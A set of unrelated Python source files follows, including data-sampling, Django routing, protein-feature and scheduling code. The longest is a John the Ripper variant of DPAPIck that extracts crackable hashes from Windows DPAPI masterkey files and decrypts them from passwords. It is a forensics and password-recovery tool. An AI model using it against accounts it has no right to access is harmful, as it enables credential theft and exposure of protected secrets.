self.chunkindices.extend([[y + self.chunkindices[-1][-1] + 1 for y in x] for x in ncis])
self.cycleindex += 1
self.cycleindex %= len(self.paths)
self.set_chunks(self.chunks)
def sample(self, length):
assert length < self.total_size // len(
self.chunks
), "Dataset files are too small to sample {} tokens at a time".format(
length)
while True:
index = self.rs.randint(0, self.total_size - length - 1)
i = binary_search(lambda j: self.boundaries[j] > index, 0,
len(self.boundaries) - 1) - 1
if self.boundaries[i + 1] > index + length:
within_chunk = index - self.boundaries[i]
return self.chunks[i][within_chunk:within_chunk + length]
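
if __name__ == '__main__':
    # Minimal self-check sketch (assumptions: no tokenizer library at hand, so a
    # stand-in encoder that maps characters to ordinals is used instead of a real
    # BPE encoder; the temp file exists only for this demo and is removed again).
    import tempfile

    class _OrdEncoder(object):
        def encode(self, text):
            return [ord(c) for c in text]

    # binary_search locates the first boundary strictly greater than an index,
    # which is how sample() finds the chunk a sampled position falls into.
    boundaries = [0, 10, 25]
    assert binary_search(lambda j: boundaries[j] > 12, 0, len(boundaries) - 1) == 2

    with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False) as fp:
        fp.write('a tiny throwaway corpus, long enough to draw short samples from')
        corpus_path = fp.name
    try:
        sampler = Sampler(_OrdEncoder(), combine=1, path=None,
                          perm_path=[corpus_path], arr_paths=True)
        print(sampler.sample(8))  # an 8-token slice that never crosses chunk boundaries
    finally:
        os.remove(corpus_path)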
|
from django.urls import path
from django.conf.urls import url
from django.urls import include
from api import views
urlpatterns = [
path('types/', include('api.types.urls')),
path('experiments/', include('api.experiments.urls')),
path('samples/', include('api.samples.urls')),
path('persons/', include('api.persons.urls')),
path('vfs/', include('api.vfs.urls')),
path('download/', include('api.download.urls')),
path('seq/', include('api.seq.urls')),
path('ucsc/', include('api.ucsc.urls')),
path('genomic/', include('api.genomic.urls')),
path('groups/', include('api.groups.urls')),
path('account/', include('api.account.urls')),
path('admin/', include('api.admin.urls')),
path('about', views.about, name='about'),
path('test', views.test, name='test')
]
|
# Required libraries
import pandas as pd
import logging as log
import time
import numpy as np
from scipy import signal
from sklearn.feature_extraction.text import CountVectorizer
# Given an iterable (list or Series), turns it into a bag of words matrix (DataFrame)
def get_bow(iterable, vocabulary=None, prefix=''):
# Turn vocabulary words lowercase, as required by CountVectorizer
if vocabulary:
vocabulary = [v.lower() for v in vocabulary]
# Apply CountVectorizer with given vocabulary
cv = CountVectorizer(vocabulary=vocabulary)
# Compute BOW matrix
bow = pd.DataFrame(cv.fit_transform(iterable).toarray(), columns=['{}{}'.format(prefix, f.upper()) for f in cv.get_feature_names()])
# Return computed bag of words
return bow
def get_bow_residues(residues, vocabulary=None, prefix='RES_NAME_'):
    return get_bow(residues, vocabulary, prefix)
def get_bow_structures(structs, vocabulary=None, prefix='STRUCT_'):
return get_bow(structs, vocabulary, prefix)
def get_bow_edge_loc(structs, vocabulary=None, prefix='EDGE_LOC_'):
return get_bow(structs, vocabulary, prefix)
def get_bow_edge_type(structs, vocabulary=None, prefix='EDGE_TYPE'):
return get_bow(structs, vocabulary, prefix)
# Given a DataFrame and a column, removes the column and adds BOW columns computed from the latter
def replace_bow(df, col, vocabulary=None, prefix='', drop=False):
# Retrieve column which will be removed
removed = df[col]
# Delete column from dataframe if requested
if drop:
df = df.drop(col, axis=1, inplace=False)
# Compute BOW
bow = get_bow(removed, vocabulary=vocabulary, prefix=prefix)
# Concatenate DataFrames
df = pd.concat([df, bow], axis=1)
# Return computed DataFrame
return df
"""
Function to apply sliding windows on a proteins dataset. It uses Gaussian Filtering
"""
def sliding_window(data, k, sd):
"""
REQUIRE:
import pandas as pd
import numpy as np
    from scipy import signal
INPUT:
data = dataframe of main features
k = the size of a window (int)
sd = the standard deviation of the gaussian filter (float)
OUTPUT:
A dataframe with sliding windows applied
"""
# Define starting time of the function
start = time.time()
#Set variables
df_windows = data.copy()
#Cycle for every protein
for pdb_id in data.PDB_ID.unique():
#Cycle for every chain in a given protein
for chain in set(data.CHAIN_ID[data.PDB_ID == pdb_id].unique()):
#Work on a reduced dataset: we apply sliding windows for every chain
df_sliced = df_windows[(data.PDB_ID == pdb_id)
& (data.CHAIN_ID == chain)]
            # Set PDB_ID, CHAIN_ID and RES_ID aside in a separate df; the gaussian filter is not applied to them
info_sliced = df_sliced.iloc[:, 0:3]
#Shortcut name for lengths
chain_len = len(data.CHAIN_ID[(data.PDB_ID == pdb_id)
& (data.CHAIN_ID == chain)])
            #Apply a symmetric mirroring at the start of the chain of size k//2
df_windows_start = pd.DataFrame(np.array(df_sliced.iloc[1:(k//2+1), ]),
index=np.arange(-k//2 + 1, 0, step = 1),
columns=list(data.columns)).sort_index()
            #Apply a symmetric mirroring at the end of the chain of size k//2
df_windows_end = pd.DataFrame(np.array(df_sliced.iloc[chain_len-(k//2 + 1):chain_len-1, ]),
index=np.arange(chain_len-1 + k//2,chain_len-1, step = -1),
columns=list(data.columns)).sort_index()
            #Now reunite these dataframes
df_with_start_sym = df_windows_start.append(df_sliced)
df_win_k = df_with_start_sym.append(df_windows_end)
### MAIN: COMPUTE GAUSSIAN FILTER OF GIVEN DATAFRAME
sliced = df_win_k.iloc[:, 3:]
window = signal.gaussian(k, std = sd)
sliced = sliced.rolling(window = k, center = True).apply(lambda x: np.dot(x,window)/k, raw=True)
# Reunite filtered features with PDB_ID, CHAIN_ID, RES_ID
tot_sliced = pd.merge(info_sliced, sliced.iloc[0:chain_len+k//2,:],
right_index=True, left_index=True) #here is chain_len + k//2
### Update the dataframe with the filtered features of given chain
df_windows[(df_windows.PDB_ID == pdb_id) & (df_windows.CHAIN_ID == chain)] = tot_sliced
# Debug time
log.debug('Window sliding took {}'.format(time.time() - start))
# Return "window slided" dataframe
return df_windows
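
if __name__ == "__main__":
    # Quick sketch of the helpers above (illustrative values only; nothing here
    # runs on import). Assumes a scikit-learn version that still provides
    # CountVectorizer.get_feature_names, as used by get_bow().
    toy = pd.Series(['ALA GLY ALA', 'GLY'])
    # Expect columns RES_NAME_ALA / RES_NAME_GLY with counts [[2, 1], [0, 1]]
    print(get_bow(toy, vocabulary=['ALA', 'GLY'], prefix='RES_NAME_'))
    # The gaussian kernel that sliding_window() dots against each length-k window;
    # signal.windows.gaussian is the non-deprecated spelling of signal.gaussian.
    print(signal.windows.gaussian(5, std=1.0))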
|
import warnings
import numpy as np
__all__ = [
'recarray_to_colmajor']
from pnumpy._pnumpy import recarray_to_colmajor as _recarray_to_colmajor
#-----------------------------------------------------------------------------------------
def recarray_to_colmajor(item, parallel=True):
"""
Converts a numpy record array (void type) to a dictionary of numpy arrays, col major
Returns
-------
A dictionary of numpy arrays corresponding to the original numpy record array.
Examples
--------
>>> x=np.array([(1.0, 2, 3, 4, 5, 'this is a long test'), (3.0, 4, 5, 6, 7, 'short'), (30.0, 40, 50, 60, 70, '')],
dtype=[('x', '<f4'), ('y', '<i2'), ('z', 'i8'),('zz','i8'),('yy','i4'),('str','<S20')])
>>> item=np.tile(x,100_000)
>>> mydict = recarray_to_colmajor(item)
"""
if item.dtype.char == 'V':
# warnings.warn(f"Converting numpy record array. Performance may suffer.")
# flip row-major to column-major
list_types = [*item.dtype.fields.values()]
success = True
for t in list_types:
val = t[0].char
# if the record type has an object or another record type, we cannot handle
if val == 'O' or val =='V':
success = False
break;
d={}
        if success and parallel:
offsets=[]
arrays=np.empty(len(item.dtype.fields), dtype='O')
arrlen = len(item)
count =0
for name, v in item.dtype.fields.items():
offsets.append(v[1])
arr= np.empty(arrlen, dtype=v[0])
arrays[count] = arr
count += 1
# build dict of names and new arrays
d[name] = arr
# Call parallel routine to convert
_recarray_to_colmajor(item, np.asarray(offsets, dtype=np.int64), arrays);
else:
# single thread way
for name in item.dtype.names:
d[name] = item[:][name].copy()
return d
warnings.warn(f"The array passed was not a numpy record array.")
return item
|
__author__ = 'Neil Butcher'
import CheckingAlgorithms
def priority(a):
return a.priority
def CheckDuration(duration, population):
events = duration.events
appointments = duration.appointments()
result = []
result.extend(CheckingAlgorithms.MissingPersonCheck(appointments, population))
result.extend(CheckingAlgorithms.UnqualifiedPersonCheck(appointments))
result.extend(CheckingAlgorithms.BlacklistedDatePersonCheck(appointments))
result.extend(CheckingAlgorithms.MultitaskingPersonCheck(events, 2))
result.extend(CheckingAlgorithms.IncompatibleMultitaskingPersonCheck(events))
result.extend(CheckingAlgorithms.MultipleOneDayAppointmentsPersonCheck(appointments, population))
result.extend(CheckingAlgorithms.MultipleOneWeekAppointmentsPersonCheck(appointments, population))
result.extend(CheckingAlgorithms.UnfilledAppointmentCheck(events))
result.extend(CheckingAlgorithms.OverloadedPersonCheck(appointments, ratioLimit=0.3))
result.extend(CheckingAlgorithms.OverloadedOneRolePersonCheck(appointments, ratioLimit=0.3))
result.extend(CheckingAlgorithms.UnderusedPersonCheck(population, appointments))
result.extend(CheckingAlgorithms.UnderusedOneRolePersonCheck(population, appointments))
return sorted(result, key=priority, reverse=True)
|
"""Games package."""
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Modified (for JtR) by Dhiru Kholia in December, 2014.
# Modified (for JtR) by Jean-Christophe Delaunay
# <jean-christophe.delaunay at synacktiv.com> in 2017
# to support further options and JtR new hash format
#
# This file is part of DPAPIck
# Windows DPAPI decryption & forensic toolkit
#
# Copyright (C) 2010, 2011 Cassidian SAS. All rights reserved.
# This document is the property of Cassidian SAS, it may not be copied or
# circulated without prior licence
#
# Author: Jean-Michel Picod <[email protected]>
#
# This program is distributed under GPLv3 licence (see LICENCE.txt)
import sys
import struct
import array
import hmac
import hashlib
import binascii
try:
from Crypto.Cipher import AES
from Crypto.Cipher import DES
from Crypto.Cipher import DES3
except ImportError:
sys.stderr.write("For additional functionality, please install PyCrypto package.\n")
import argparse
from collections import defaultdict
debug = False
class Eater(object):
"""This class is a helper for parsing binary structures."""
def __init__(self, raw, offset=0, end=None, endianness="<"):
self.raw = raw
self.ofs = offset
if end is None:
end = len(raw)
self.end = end
self.endianness = endianness
def prepare_fmt(self, fmt):
"""Internal use. Prepend endianness to the given format if it is not
already specified.
fmt is a format string for struct.unpack()
Returns a tuple of the format string and the corresponding data size.
"""
if fmt[0] not in ("<", ">", "!", "@"):
fmt = self.endianness + fmt
return fmt, struct.calcsize(fmt)
def read(self, fmt):
"""Parses data with the given format string without taking away bytes.
Returns an array of elements or just one element depending on fmt.
"""
fmt, sz = self.prepare_fmt(fmt)
v = struct.unpack_from(fmt, self.raw, self.ofs)
if len(v) == 1:
v = v[0]
return v
def eat(self, fmt):
"""Parses data with the given format string.
Returns an array of elements or just one element depending on fmt.
"""
fmt, sz = self.prepare_fmt(fmt)
v = struct.unpack_from(fmt, self.raw, self.ofs)
if len(v) == 1:
v = v[0]
self.ofs += sz
return v
def eat_string(self, length):
"""Eats and returns a string of length characters"""
return self.eat("%us" % length)
def eat_length_and_string(self, fmt):
"""Eats and returns a string which length is obtained after eating
an integer represented by fmt
"""
l = self.eat(fmt)
return self.eat_string(l)
def pop(self, fmt):
"""Eats a structure represented by fmt from the end of raw data"""
fmt, sz = self.prepare_fmt(fmt)
self.end -= sz
v = struct.unpack_from(fmt, self.raw, self.end)
if len(v) == 1:
v = v[0]
return v
def pop_string(self, length):
"""Pops and returns a string of length characters"""
return self.pop("%us" % length)
def pop_length_and_string(self, fmt):
"""Pops and returns a string which length is obtained after poping an
integer represented by fmt.
"""
l = self.pop(fmt)
return self.pop_string(l)
def remain(self):
"""Returns all the bytes that have not been eated nor poped yet."""
return self.raw[self.ofs:self.end]
def eat_sub(self, length):
"""Eats a sub-structure that is contained in the next length bytes"""
sub = self.__class__(self.raw[self.ofs:self.ofs+length], endianness=self.endianness)
self.ofs += length
return sub
def __nonzero__(self):
return self.ofs < self.end
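# Usage sketch for Eater (kept as a comment so running this tool is unchanged;
# values are illustrative): with raw = struct.pack("<LH4s", 7, 3, "abcd"),
# Eater(raw).eat("L") yields 7, a following .eat("H") yields 3 and
# .eat_string(4) yields "abcd"; this is exactly how the parse() methods below
# walk the masterkey structures field by field.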
class DataStruct(object):
"""Don't use this class unless you know what you are doing!"""
def __init__(self, raw=None):
if raw is not None:
self.parse(Eater(raw, endianness="<"))
def parse(self, eater_obj):
raise NotImplementedError("This function must be implemented in subclasses")
class DPAPIBlob(DataStruct):
"""Represents a DPAPI blob"""
def __init__(self, raw=None):
"""Constructs a DPAPIBlob. If raw is set, automatically calls
parse().
"""
self.version = None
self.provider = None
self.mkguid = None
self.mkversion = None
self.flags = None
self.description = None
self.cipherAlgo = None
self.keyLen = 0
self.hmac = None
self.strong = None
self.hashAlgo = None
self.hashLen = 0
self.cipherText = None
self.salt = None
self.blob = None
self.sign = None
self.cleartext = None
self.decrypted = False
self.signComputed = None
DataStruct.__init__(self, raw)
def __repr__(self):
s = ["DPAPI BLOB",
"\n".join(("\tversion = %(version)d",
"\tprovider = %(provider)s",
"\tmkey = %(mkguid)s",
"\tflags = %(flags)#x",
"\tdescr = %(description)s",
"\tcipherAlgo = %(cipherAlgo)r",
"\thashAlgo = %(hashAlgo)r")) % self.__dict__,
"\tsalt = %s" % self.salt.encode('hex'),
"\thmac = %s" % self.hmac.encode('hex'),
"\tcipher = %s" % self.cipherText.encode('hex'),
"\tsign = %s" % self.sign.encode('hex')]
if self.signComputed is not None:
s.append("\tsignComputed = %s" % self.signComputed.encode('hex'))
if self.cleartext is not None:
s.append("\tcleartext = %r" % self.cleartext)
return "\n".join(s)
class CryptoAlgo(object):
"""This class is used to wrap Microsoft algorithm IDs with M2Crypto"""
class Algo(object):
def __init__(self, data):
self.data = data
def __getattr__(self, attr):
if attr in self.data:
return self.data[attr]
raise AttributeError(attr)
_crypto_data = {}
@classmethod
def add_algo(cls, algnum, **kargs):
cls._crypto_data[algnum] = cls.Algo(kargs)
if 'name' in kargs:
kargs['ID'] = algnum
cls._crypto_data[kargs['name']] = cls.Algo(kargs)
@classmethod
def get_algo(cls, algnum):
return cls._crypto_data[algnum]
def __init__(self, i):
self.algnum = i
self.algo = CryptoAlgo.get_algo(i)
name = property(lambda self: self.algo.name)
module = property(lambda self: self.algo.module)
keyLength = property(lambda self: self.algo.keyLength / 8)
ivLength = property(lambda self: self.algo.IVLength / 8)
blockSize = property(lambda self: self.algo.blockLength / 8)
digestLength = property(lambda self: self.algo.digestLength / 8)
def do_fixup_key(self, key):
try:
return self.algo.keyFixup.__call__(key)
except AttributeError:
return key
def __repr__(self):
return "%s [%#x]" % (self.algo.name, self.algnum)
def des_set_odd_parity(key):
_lut = [1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, 16, 16, 19,
19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, 32, 32, 35, 35, 37,
37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, 49, 49, 50, 50, 52, 52, 55,
55, 56, 56, 59, 59, 61, 61, 62, 62, 64, 64, 67, 67, 69, 69, 70, 70, 73,
73, 74, 74, 76, 76, 79, 79, 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91,
91, 93, 93, 94, 94, 97, 97, 98, 98, 100, 100, 103, 103, 104, 104, 107,
107, 109, 109, 110, 110, 112, 112, 115, 115, 117, 117, 118, 118, 121,
121, 122, 122, 124, 124, 127, 127, 128, 128, 131, 131, 133, 133, 134,
134, 137, 137, 138, 138, 140, 140, 143, 143, 145, 145, 146, 146, 148,
148, 151, 151, 152, 152, 155, 155, 157, 157, 158, 158, 161, 161, 162,
162, 164, 164, 167, 167, 168, 168, 171, 171, 173, 173, 174, 174, 176,
176, 179, 179, 181, 181, 182, 182, 185, 185, 186, 186, 188, 188, 191,
191, 193, 193, 194, 194, 196, 196, 199, 199, 200, 200, 203, 203, 205,
205, 206, 206, 208, 208, 211, 211, 213, 213, 214, 214, 217, 217, 218,
218, 220, 220, 223, 223, 224, 224, 227, 227, 229, 229, 230, 230, 233,
233, 234, 234, 236, 236, 239, 239, 241, 241, 242, 242, 244, 244, 247,
247, 248, 248, 251, 251, 253, 253, 254, 254]
tmp = array.array("B")
tmp.fromstring(key)
for i, v in enumerate(tmp):
tmp[i] = _lut[v]
return tmp.tostring()
CryptoAlgo.add_algo(0x6603, name="DES3", keyLength=192, IVLength=64, blockLength=64, module=DES3,
keyFixup=des_set_odd_parity)
CryptoAlgo.add_algo(0x6611, name="AES", keyLength=128, IVLength=128, blockLength=128, module=AES)
CryptoAlgo.add_algo(0x660e, name="AES-128", keyLength=128, IVLength=128, blockLength=128, module=AES)
CryptoAlgo.add_algo(0x660f, name="AES-192", keyLength=192, IVLength=128, blockLength=128, module=AES)
CryptoAlgo.add_algo(0x6610, name="AES-256", keyLength=256, IVLength=128, blockLength=128, module=AES)
CryptoAlgo.add_algo(0x6601, name="DES", keyLength=64, IVLength=64, blockLength=64, module=DES,
keyFixup=des_set_odd_parity)
CryptoAlgo.add_algo(0x8009, name="HMAC", digestLength=160, blockLength=512)
CryptoAlgo.add_algo(0x8003, name="md5", digestLength=128, blockLength=512)
CryptoAlgo.add_algo(0x8004, name="sha1", digestLength=160, blockLength=512)
CryptoAlgo.add_algo(0x800c, name="sha256", digestLength=256, blockLength=512)
CryptoAlgo.add_algo(0x800d, name="sha384", digestLength=384, blockLength=1024)
CryptoAlgo.add_algo(0x800e, name="sha512", digestLength=512, blockLength=1024)
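# Lookup sketch (comment only, values follow from the registrations above):
# CryptoAlgo(0x6610).name is "AES-256", its keyLength is 32 bytes and its
# ivLength 16 bytes (the registered bit sizes divided by 8); entries can also
# be resolved by name, e.g. CryptoAlgo("AES-256") maps to the same algorithm.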
def pbkdf2_ms(passphrase, salt, keylen, iterations, digest='sha1'):
"""Implementation of PBKDF2 that allows specifying digest algorithm.
Returns the corresponding expanded key which is keylen long.
Note: This is not real pbkdf2, but instead a slight modification of it.
Seems like Microsoft tried to implement pbkdf2 but got the xoring wrong.
"""
buff = ""
i = 1
while len(buff) < keylen:
U = salt + struct.pack("!L", i)
i += 1
derived = hmac.new(passphrase, U, digestmod=lambda: hashlib.new(digest)).digest()
for r in xrange(iterations - 1):
actual = hmac.new(passphrase, derived, digestmod=lambda: hashlib.new(digest)).digest()
derived = ''.join([chr(ord(x) ^ ord(y)) for (x, y) in zip(derived, actual)])
buff += derived
return buff[:keylen]
def pbkdf2(passphrase, salt, keylen, iterations, digest='sha1'):
"""Implementation of PBKDF2 that allows specifying digest algorithm.
Returns the corresponding expanded key which is keylen long.
"""
buff = ""
i = 1
while len(buff) < keylen:
U = salt + struct.pack("!L", i)
i += 1
derived = hmac.new(passphrase, U, digestmod=lambda: hashlib.new(digest)).digest()
actual = derived
for r in xrange(iterations - 1):
actual = hmac.new(passphrase, actual, digestmod=lambda: hashlib.new(digest)).digest()
derived = ''.join([chr(ord(x) ^ ord(y)) for (x, y) in zip(derived, actual)])
buff += derived
return buff[:keylen]
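# Note on the two variants above (derived from the code itself, not external docs):
# pbkdf2() chains the raw HMAC values U_1, U_2, ... and xors each one into the
# running block, matching RFC 2898, whereas pbkdf2_ms() feeds the xor-accumulated
# block back into the next HMAC, which is the Microsoft-specific behaviour that
# DPAPI masterkey decryption relies on (see dataDecrypt below).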
def derivePwdHash(pwdhash, userSID, digest='sha1'):
"""Internal use. Computes the encryption key from a user's password hash"""
return hmac.new(pwdhash, (userSID + "\0").encode("UTF-16LE"), digestmod=lambda: hashlib.new(digest)).digest()
def dataDecrypt(cipherAlgo, hashAlgo, raw, encKey, iv, rounds):
"""Internal use. Decrypts data stored in DPAPI structures."""
hname = {"HMAC": "sha1"}.get(hashAlgo.name, hashAlgo.name)
derived = pbkdf2_ms(encKey, iv, cipherAlgo.keyLength + cipherAlgo.ivLength, rounds, hname)
key, iv = derived[:cipherAlgo.keyLength], derived[cipherAlgo.keyLength:]
key = key[:cipherAlgo.keyLength]
iv = iv[:cipherAlgo.ivLength]
cipher = cipherAlgo.module.new(key, mode=cipherAlgo.module.MODE_CBC, IV=iv)
cleartxt = cipher.decrypt(raw)
return cleartxt
def DPAPIHmac(hashAlgo, pwdhash, hmacSalt, value):
"""Internal function used to compute HMACs of DPAPI structures"""
hname = {"HMAC": "sha1"}.get(hashAlgo.name, hashAlgo.name)
encKey = hmac.new(pwdhash, digestmod=lambda: hashlib.new(hname))
encKey.update(hmacSalt)
encKey = encKey.digest()
rv = hmac.new(encKey, digestmod=lambda: hashlib.new(hname))
rv.update(value)
return rv.digest()
def display_masterkey(Preferred):
GUID1 = Preferred.read(8)
GUID2 = Preferred.read(8).decode()
GUID = struct.unpack("<LHH", GUID1)
GUID2 = struct.unpack(">HLH", GUID2)
print ("%s-%s-%s-%s-%s%s" % (format(GUID[0], '08x'), format(GUID[1], '04x'), format(GUID[2], '04x'), format(GUID2[0], '04x'), format(GUID2[1], '08x'), format(GUID2[2], '04x')))
class MasterKey(DataStruct):
"""This class represents a MasterKey block contained in a MasterKeyFile"""
def __init__(self, raw=None, SID=None, context=None):
self.decrypted = False
self.key = None
self.key_hash = None
self.hmacSalt = None
self.hmac = None
self.hmacComputed = None
self.cipherAlgo = None
self.hashAlgo = None
self.rounds = None
self.iv = None
self.version = None
self.ciphertext = None
self.SID = SID
self.context = context
DataStruct.__init__(self, raw)
def __getstate__(self):
d = dict(self.__dict__)
for k in ["cipherAlgo", "hashAlgo"]:
if k in d:
d[k] = d[k].algnum
return d
def __setstate__(self, d):
for k in ["cipherAlgo", "hashAlgo"]:
if k in d:
d[k] = CryptoAlgo(d[k])
self.__dict__.update(d)
def parse(self, data):
self.version = data.eat("L")
self.iv = data.eat("16s")
self.rounds = data.eat("L")
self.hashAlgo = CryptoAlgo(data.eat("L"))
self.cipherAlgo = CryptoAlgo(data.eat("L"))
self.ciphertext = data.remain()
if self.SID:
print (self.jhash())
def decryptWithHash(self, userSID, pwdhash):
"""Decrypts the masterkey with the given user's hash and SID.
Simply computes the corresponding key then calls self.decryptWithKey()
"""
self.decryptWithKey(derivePwdHash(pwdhash, userSID))
def jhash(self):
version = -1
hmac_algo = None
cipher_algo = None
if "des3" in str(self.cipherAlgo).lower() and "hmac" in str(self.hashAlgo).lower():
version = 1
hmac_algo = "sha1"
cipher_algo = "des3"
elif "aes-256" in str(self.cipherAlgo).lower() and "sha512" in str(self.hashAlgo).lower():
version = 2
hmac_algo = "sha512"
cipher_algo = "aes256"
else:
return "Unsupported combination of cipher '%s' and hash algorithm '%s' found!" % (self.cipherAlgo, self.hashAlgo)
context = 0
if self.context == "domain":
context = 2
s = "$DPAPImk$%d*%d*%s*%s*%s*%d*%s*%d*%s" % (version, context, self.SID, cipher_algo, hmac_algo, self.rounds, binascii.hexlify(self.iv).encode(),
len(binascii.hexlify(self.ciphertext)), binascii.hexlify(self.ciphertext))
context = 3
s += "\n$DPAPImk$%d*%d*%s*%s*%s*%d*%s*%d*%s" % (version, context, self.SID, cipher_algo, hmac_algo, self.rounds,
binascii.hexlify(self.iv), len(binascii.hexlify(self.ciphertext)), binascii.hexlify(self.ciphertext))
else:
if self.context == "local":
context = 1
elif self.context == "domain1607-":
context = 2
elif self.context == "domain1607+":
context = 3
s = "$DPAPImk$%d*%d*%s*%s*%s*%d*%s*%d*%s" % (version, context, self.SID, cipher_algo, hmac_algo, self.rounds,
binascii.hexlify(self.iv).decode(),len(binascii.hexlify(self.ciphertext)), binascii.hexlify(self.ciphertext).decode())
return s
def setKeyHash(self, h):
assert(len(h) == 20)
self.decrypted = True
self.key_hash = h
def setDecryptedKey(self, data):
assert len(data) == 64
self.decrypted = True
self.key = data
self.key_hash = hashlib.sha1(data).digest()
def decryptWithKey(self, pwdhash):
"""Decrypts the masterkey with the given encryption key. This function
also extracts the HMAC part of the decrypted stuff and compare it with
the computed one.
Note that, once successfully decrypted, the masterkey will not be
decrypted anymore; this function will simply return.
"""
if self.decrypted:
return
if not self.ciphertext:
return
cleartxt = dataDecrypt(self.cipherAlgo, self.hashAlgo, self.ciphertext, pwdhash, self.iv, self.rounds)
self.key = cleartxt[-64:]
self.hmacSalt = cleartxt[:16]
self.hmac = cleartxt[16:16 + self.hashAlgo.digestLength]
self.hmacComputed = DPAPIHmac(self.hashAlgo, pwdhash, self.hmacSalt, self.key)
self.decrypted = self.hmac == self.hmacComputed
def __repr__(self):
s = ["Masterkey block"]
if self.cipherAlgo is not None:
s.append("\tcipher algo = %s" % repr(self.cipherAlgo))
if self.hashAlgo is not None:
s.append("\thash algo = %s" % repr(self.hashAlgo))
if self.rounds is not None:
s.append("\trounds = %i" % self.rounds)
if self.iv is not None:
s.append("\tIV = %s" % binascii.hexlify(self.iv))
if self.key is not None:
s.append("\tkey = %s" % self.key.encode("hex"))
if self.hmacSalt is not None:
s.append("\thmacSalt = %s" % self.hmacSalt.encode("hex"))
if self.hmac is not None:
s.append("\thmac = %s" % self.hmac.encode("hex"))
if self.hmacComputed is not None:
s.append("\thmacComputed = %s" % self.hmacComputed.encode("hex"))
if self.key_hash is not None:
s.append("\tkey hash = %s" % self.key_hash.encode("hex"))
if self.ciphertext is not None:
s.append("\tciphertext = %s" % binascii.hexlify(self.ciphertext))
return "\n".join(s)
class MasterKeyFile(DataStruct):
"""This class represents a masterkey file."""
def __init__(self, raw=None, SID=None, context=None):
self.masterkey = None
self.backupkey = None
self.credhist = None
self.domainkey = None
self.decrypted = False
self.version = None
self.guid = None
self.policy = None
self.masterkeyLen = self.backupkeyLen = self.credhistLen = self.domainkeyLen = 0
self.SID = SID
self.context = context
DataStruct.__init__(self, raw)
def parse(self, data):
self.version = data.eat("L")
# print self.version
data.eat("2L")
self.guid = data.eat("72s").decode("UTF-16LE").encode("utf-8")
# print "GUID", self.guid
data.eat("2L")
self.policy = data.eat("L")
self.masterkeyLen = data.eat("Q")
# print self.masterkeyLen
self.backupkeyLen = data.eat("Q")
self.credhistLen = data.eat("Q")
self.domainkeyLen = data.eat("Q")
if self.masterkeyLen > 0:
self.masterkey = MasterKey(SID=self.SID, context=self.context)
self.masterkey.parse(data.eat_sub(self.masterkeyLen))
if self.backupkeyLen > 0:
self.backupkey = MasterKey()
self.backupkey.parse(data.eat_sub(self.backupkeyLen))
def decryptWithHash(self, userSID, h):
"""See MasterKey.decryptWithHash()"""
if not self.masterkey.decrypted:
self.masterkey.decryptWithHash(userSID, h)
if not self.backupkey.decrypted:
self.backupkey.decryptWithHash(userSID, h)
self.decrypted = self.masterkey.decrypted or self.backupkey.decrypted
def decryptWithPassword(self, userSID, pwd, context):
"""See MasterKey.decryptWithPassword()"""
algo = None
if context == "domain1607-" or context == "domain":
self.decryptWithHash(userSID, hashlib.new("md4", pwd.encode('UTF-16LE')).digest())
if self.decrypted:
print ("Decrypted succesfully as domain1607-")
return
if context == "domain1607+" or context == "domain":
SIDenc = userSID.encode("UTF-16LE")
NTLMhash = hashlib.new("md4", pwd.encode('UTF-16LE')).digest()
derived = pbkdf2(NTLMhash, SIDenc, 32, 10000, digest='sha256')
derived = pbkdf2(derived, SIDenc, 16, 1, digest='sha256')
self.decryptWithHash(userSID, derived)
if self.decrypted:
print ("Decrypted succesfully as domain1607+")
return
if context == "local":
self.decryptWithHash(userSID, hashlib.new("sha1", pwd.encode('UTF-16LE')).digest())
def __repr__(self):
s = ["\n#### MasterKeyFile %s ####" % self.guid]
if self.version is not None:
s.append("\tversion = %#d" % self.version)
if self.policy is not None:
s.append("\tPolicy = %#x" % self.policy)
if self.masterkeyLen > 0:
s.append("\tMasterKey = %d" % self.masterkeyLen)
if self.backupkeyLen > 0:
s.append("\tBackupKey = %d" % self.backupkeyLen)
if self.domainkeyLen > 0:
s.append("\tDomainKey = %d" % self.domainkeyLen)
if self.masterkey:
s.append(" + Master Key: %s" % repr(self.masterkey))
if self.backupkey:
s.append(" + Backup Key: %s" % repr(self.backupkey))
if self.domainkey:
s.append(" + %s" % repr(self.domainkey))
return "\n".join(s)
class MasterKeyPool(object):
"""This class is the pivot for using DPAPIck. It manages all the DPAPI
structures and contains all the decryption intelligence.
"""
def __init__(self):
self.keys = defaultdict(lambda: [])
self.passwords = set()
def addMasterKey(self, mkey, SID=None, context=None):
"""Add a MasterKeyFile is the pool.
mkey is a string representing the content of the file to add.
"""
mkf = MasterKeyFile(mkey, SID=SID, context=context)
self.keys[mkf.guid].append(mkf)
def addMasterKeyHash(self, guid, h):
self.keys[guid].append(MasterKeyFile().addKeyHash(guid, h))
def try_credential(self, userSID, password, context):
"""This function tries to decrypt every masterkey contained in the pool
that has not been successfully decrypted yet with the given password and
SID.
userSID is a string representing the user's SID
password is a string representing the user's password.
        Returns the number of masterkeys that have been successfully decrypted
with those credentials.
"""
n = 0
for mkl in self.keys.values():
if debug:
print(mkl)
for mk in mkl:
if not mk.decrypted:
if password is not None:
mk.decryptWithPassword(userSID, password, context)
if mk.decrypted:
self.passwords.add(password)
n += 1
return n
def __repr__(self):
s = ["MasterKeyPool:",
"Passwords:",
repr(self.passwords),
"Keys:",
repr(self.keys.items())]
        if getattr(self, "system", None) is not None:
            s.append(repr(self.system))
        for i in getattr(self, "creds", {}).keys():
            s.append("\tSID: %s" % i)
            s.append(repr(self.creds[i]))
return "\n".join(s)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--sid', required=False, help="SID of account owning the masterkey file.")
parser.add_argument('-mk', '--masterkey', required=False, help="masterkey file (usually in %%APPDATA%%\\Protect\\<SID>).")
parser.add_argument('-d', '--debug', default=False, action='store_true', dest="debug")
parser.add_argument('-c', '--context', required=False, help="context of user account. 1607 refers to Windows 10 1607 update.", choices=['domain', 'domain1607+', 'domain1607-', 'local'])
parser.add_argument('-P', '--preferred', required=False, help="'Preferred' file containing GUID of masterkey file in use (usually in %%APPDATA%%\\Protect\\<SID>). Cannot be used with any other command.")
parser.add_argument("--password", metavar="PASSWORD", dest="password", help="password to decrypt masterkey file.")
